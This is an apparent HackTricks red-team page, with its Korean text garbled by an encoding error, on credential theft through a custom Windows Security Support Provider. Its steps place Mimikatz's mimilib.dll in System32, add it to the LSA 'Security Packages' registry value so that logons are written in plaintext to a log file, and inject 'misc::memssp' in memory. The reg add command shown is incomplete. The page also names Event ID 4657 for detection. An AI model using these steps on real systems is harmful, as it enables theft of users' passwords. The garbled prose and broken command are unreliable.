Custom SSP

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

Custom SSP

SSP(๋ณด์•ˆ ์ง€์› ๊ณต๊ธ‰์ž)๊ฐ€ ๋ฌด์—‡์ธ์ง€ ์—ฌ๊ธฐ์—์„œ ์•Œ์•„๋ณด์„ธ์š”.
์ž์‹ ์˜ SSP๋ฅผ ์ƒ์„ฑํ•˜์—ฌ ๋ช…ํ™•ํ•œ ํ…์ŠคํŠธ๋กœ ์ž๊ฒฉ ์ฆ๋ช…์„ ์บก์ฒ˜ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Mimilib

Mimikatz์—์„œ ์ œ๊ณตํ•˜๋Š” mimilib.dll ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๊ฒƒ์€ ๋ชจ๋“  ์ž๊ฒฉ ์ฆ๋ช…์„ ๋ช…ํ™•ํ•œ ํ…์ŠคํŠธ๋กœ ํŒŒ์ผ์— ๊ธฐ๋กํ•ฉ๋‹ˆ๋‹ค.
dll์„ C:\Windows\System32\์— ๋ฐฐ์น˜ํ•˜์„ธ์š”.
๊ธฐ์กด LSA ๋ณด์•ˆ ํŒจํ‚ค์ง€ ๋ชฉ๋ก์„ ๊ฐ€์ ธ์˜ต๋‹ˆ๋‹ค:

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

mimilib.dll๋ฅผ ๋ณด์•ˆ ์ง€์› ๊ณต๊ธ‰์ž ๋ชฉ๋ก(๋ณด์•ˆ ํŒจํ‚ค์ง€)์— ์ถ”๊ฐ€ํ•ฉ๋‹ˆ๋‹ค:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

์žฌ๋ถ€ํŒ… ํ›„ ๋ชจ๋“  ์ž๊ฒฉ ์ฆ๋ช…์€ C:\Windows\System32\kiwissp.log์— ํ‰๋ฌธ์œผ๋กœ ์ €์žฅ๋ฉ๋‹ˆ๋‹ค.

๋ฉ”๋ชจ๋ฆฌ ๋‚ด

Mimikatz๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ฉ”๋ชจ๋ฆฌ์— ์ง์ ‘ ์ฃผ์ž…ํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค(์•ฝ๊ฐ„ ๋ถˆ์•ˆ์ •ํ•˜๊ฑฐ๋‚˜ ์ž‘๋™ํ•˜์ง€ ์•Š์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค).

privilege::debug
misc::memssp

์ด๊ฒƒ์€ ์žฌ๋ถ€ํŒ… ์‹œ ์œ ์ง€๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

์™„ํ™”

์ด๋ฒคํŠธ ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages์˜ ๊ฐ์‚ฌ ์ƒ์„ฑ/๋ณ€๊ฒฝ

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ